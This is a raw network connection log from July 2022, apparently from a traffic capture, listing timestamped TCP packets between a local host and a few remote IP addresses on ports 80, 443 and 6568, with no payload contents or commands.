                                                                                                                                                                                Jul 16, 2022 23:57:24.367680073 CEST8049791142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:24.370212078 CEST4979180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:24.371624947 CEST4979180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:24.399090052 CEST8049791142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:24.399126053 CEST8049791142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:24.399141073 CEST8049791142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:24.399215937 CEST4979180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:24.399255991 CEST4979180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:24.401552916 CEST4979180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:24.401642084 CEST4979180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:26.810316086 CEST4980580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:26.838494062 CEST8049805142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:26.838624954 CEST4980580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:26.842829943 CEST4980580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:26.869575024 CEST8049805142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:26.869627953 CEST8049805142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:26.869663000 CEST8049805142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:26.869697094 CEST4980580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:26.869724035 CEST4980580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:26.870358944 CEST4980580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:26.870461941 CEST4980580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:26.898906946 CEST8049805142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:26.898973942 CEST4980580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:27.086255074 CEST49807443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.086291075 CEST4434980749.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.088084936 CEST49807443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.088820934 CEST49807443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.088836908 CEST4434980749.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.144396067 CEST4434980749.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.144514084 CEST49807443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.145298004 CEST49807443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.145311117 CEST4434980749.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.145641088 CEST4434980749.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.145721912 CEST49807443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.497560978 CEST49807443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.555247068 CEST4981080192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.582046986 CEST804981049.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.582139015 CEST4981080192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.582989931 CEST4981080192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.609106064 CEST804981049.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.611453056 CEST804981049.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.611495018 CEST804981049.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.611560106 CEST4981080192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.631666899 CEST4981080192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.659316063 CEST804981049.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.659358978 CEST804981049.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:27.659415960 CEST4981080192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:27.998550892 CEST4981080192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:28.022267103 CEST804981049.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:28.068332911 CEST498136568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:28.091809034 CEST65684981349.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:28.091933966 CEST498136568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:28.093122005 CEST498136568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:28.116466045 CEST65684981349.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:28.118195057 CEST65684981349.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:28.118237019 CEST65684981349.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:28.118328094 CEST498136568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:28.130727053 CEST498136568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:28.154280901 CEST65684981349.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:28.154354095 CEST65684981349.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:28.154453993 CEST498136568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:28.646300077 CEST498136568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:28.669857979 CEST65684981349.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:29.496061087 CEST4982080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:29.525816917 CEST8049820142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:29.527712107 CEST4982080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:29.528261900 CEST4982080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:29.558032036 CEST8049820142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:29.558214903 CEST8049820142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:29.558394909 CEST4982080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:29.558530092 CEST8049820142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:29.558582067 CEST4982080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:29.560656071 CEST4982080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:29.560672045 CEST4982080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:29.591238976 CEST8049820142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:29.591353893 CEST4982080192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:33.800137997 CEST4983280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:33.828110933 CEST8049832142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:33.828211069 CEST4983280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:33.892160892 CEST4983280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:33.918677092 CEST8049832142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:33.918724060 CEST8049832142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:33.918744087 CEST8049832142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:33.918807030 CEST4983280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:33.918864012 CEST4983280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:33.934715033 CEST4983280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:33.934757948 CEST4983280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:40.956829071 CEST4984580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:40.985815048 CEST8049845142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:40.986332893 CEST4984580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:40.987526894 CEST4984580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:41.016335964 CEST8049845142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:41.016365051 CEST8049845142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:41.016396046 CEST8049845142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:41.016458988 CEST4984580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:41.016514063 CEST4984580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:41.017354012 CEST4984580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:41.017386913 CEST4984580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:41.045758963 CEST8049845142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:41.051148891 CEST4984580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:42.433160067 CEST4985180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:42.460649967 CEST8049851142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:42.463171005 CEST4985180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:42.486418009 CEST4985180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:42.513303041 CEST8049851142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:42.513360023 CEST8049851142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:42.513382912 CEST8049851142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:42.514276981 CEST4985180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:42.514652967 CEST4985180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:42.514714003 CEST4985180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:43.787878990 CEST4985580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:43.814558983 CEST8049855142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:43.815093040 CEST4985580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:43.815694094 CEST4985580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:43.842322111 CEST8049855142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:43.842459917 CEST8049855142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:43.842511892 CEST8049855142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:43.842607975 CEST4985580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:43.843878984 CEST4985580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:43.843913078 CEST4985580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:44.531563997 CEST49856443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:44.531618118 CEST4434985649.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:44.531718016 CEST49856443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:44.532871962 CEST49856443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:44.532902002 CEST4434985649.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:44.585697889 CEST4434985649.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:44.585865974 CEST49856443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:44.586895943 CEST49856443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:44.586913109 CEST4434985649.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:44.587176085 CEST4434985649.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:44.587249041 CEST49856443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:45.213696003 CEST49856443192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:45.247277975 CEST4985780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:45.266661882 CEST4985880192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:57:45.273992062 CEST8049857142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.274081945 CEST4985780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:45.276844025 CEST4985780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:45.295372009 CEST804985892.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.295486927 CEST4985880192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:57:45.296717882 CEST4985880192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:57:45.303518057 CEST8049857142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.303544044 CEST8049857142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.303558111 CEST8049857142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.303605080 CEST4985780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:45.303633928 CEST4985780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:45.306390047 CEST4985780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:45.306464911 CEST4985780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:45.327656984 CEST804985892.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.329350948 CEST804985892.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.329385042 CEST804985892.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.329456091 CEST4985880192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:57:45.335033894 CEST8049857142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.335119009 CEST4985780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:45.346925020 CEST4985880192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:57:45.377835035 CEST804985892.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.377926111 CEST804985892.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.377993107 CEST4985880192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:57:45.774416924 CEST4985880192.168.2.592.223.88.41
                                                                                                                                                                                Jul 16, 2022 23:57:45.804625034 CEST804985892.223.88.41192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.820558071 CEST498596568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:45.850728989 CEST65684985949.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.850909948 CEST498596568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:45.856496096 CEST498596568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:45.882639885 CEST65684985949.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.884578943 CEST65684985949.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.884644985 CEST65684985949.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.884711027 CEST498596568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:45.904032946 CEST498596568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:45.929431915 CEST65684985949.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.929461002 CEST65684985949.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:45.929529905 CEST498596568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:46.243408918 CEST498596568192.168.2.549.12.130.236
                                                                                                                                                                                Jul 16, 2022 23:57:46.270082951 CEST65684985949.12.130.236192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:46.698084116 CEST4986280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:46.729646921 CEST8049862142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:46.729914904 CEST4986280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:46.730978966 CEST4986280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:46.758614063 CEST8049862142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:46.758766890 CEST8049862142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:46.758783102 CEST8049862142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:46.758825064 CEST4986280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:46.758850098 CEST4986280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:46.787581921 CEST4986280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:46.787746906 CEST4986280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:48.065171003 CEST4986380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:48.092658043 CEST8049863142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:48.092890978 CEST4986380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:48.095566988 CEST4986380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:48.122440100 CEST8049863142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:48.122476101 CEST8049863142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:48.122550964 CEST8049863142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:48.122554064 CEST4986380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:48.122637987 CEST4986380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:48.164166927 CEST4986380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:48.164211035 CEST4986380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:48.192734003 CEST8049863142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:48.194945097 CEST4986380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:49.497435093 CEST4986480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:49.523894072 CEST8049864142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:49.524260044 CEST4986480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:49.525136948 CEST4986480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:49.551436901 CEST8049864142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:49.551508904 CEST8049864142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:49.551537991 CEST8049864142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:49.551630020 CEST4986480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:49.551661968 CEST4986480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:49.589663982 CEST4986480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:49.589705944 CEST4986480192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:50.876641989 CEST4986580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:50.904233932 CEST8049865142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:50.904391050 CEST4986580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:50.913546085 CEST4986580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:50.942166090 CEST8049865142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:50.942202091 CEST8049865142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:50.942225933 CEST8049865142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:50.942261934 CEST4986580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:50.942300081 CEST4986580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:50.947408915 CEST4986580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:50.947455883 CEST4986580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:50.974073887 CEST8049865142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:50.974158049 CEST4986580192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:53.366791010 CEST4986680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:53.393500090 CEST8049866142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:53.393719912 CEST4986680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:53.439694881 CEST4986680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:53.466414928 CEST8049866142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:53.466470003 CEST8049866142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:53.466496944 CEST8049866142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:53.466592073 CEST4986680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:53.472577095 CEST4986680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:53.472629070 CEST4986680192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:55.676389933 CEST4986780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:55.704833031 CEST8049867142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:55.706041098 CEST4986780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:55.710952997 CEST4986780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:55.737852097 CEST8049867142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:55.737890005 CEST8049867142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:55.737912893 CEST8049867142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:55.737997055 CEST4986780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:55.738033056 CEST4986780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:55.738759995 CEST4986780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:55.738811016 CEST4986780192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:58.136060953 CEST4986880192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:58.165460110 CEST8049868142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:58.165565014 CEST4986880192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:58.168642998 CEST4986880192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:58.197483063 CEST8049868142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:58.197532892 CEST8049868142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:58.197556973 CEST8049868142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:58.197594881 CEST4986880192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:58.197626114 CEST4986880192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:58.199074984 CEST4986880192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:58.199134111 CEST4986880192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:57:58.226037025 CEST8049868142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:57:58.226139069 CEST4986880192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:00.878367901 CEST4987180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:00.905169010 CEST8049871142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:00.905340910 CEST4987180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:00.906277895 CEST4987180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:00.932897091 CEST8049871142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:00.932934999 CEST8049871142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:00.932960033 CEST8049871142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:00.933072090 CEST4987180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:00.934729099 CEST4987180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:00.934779882 CEST4987180192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:03.626096010 CEST4987280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:03.653186083 CEST8049872142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:03.653317928 CEST4987280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:03.656693935 CEST4987280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:03.683655977 CEST8049872142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:03.683681965 CEST8049872142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:03.683696032 CEST8049872142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:03.683753967 CEST4987280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:03.683782101 CEST4987280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:03.692528963 CEST4987280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:03.693989038 CEST4987280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:03.719471931 CEST8049872142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:03.719537973 CEST4987280192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:05.808655977 CEST4987380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:05.835587978 CEST8049873142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:05.835692883 CEST4987380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:05.836945057 CEST4987380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:05.863768101 CEST8049873142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:05.863981009 CEST8049873142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:05.864008904 CEST8049873142.250.102.82192.168.2.5
                                                                                                                                                                                Jul 16, 2022 23:58:05.864092112 CEST4987380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:05.864118099 CEST4987380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:05.867948055 CEST4987380192.168.2.5142.250.102.82
                                                                                                                                                                                Jul 16, 2022 23:58:05.867990017 CEST4987380192.168.2.5142.250.102.82
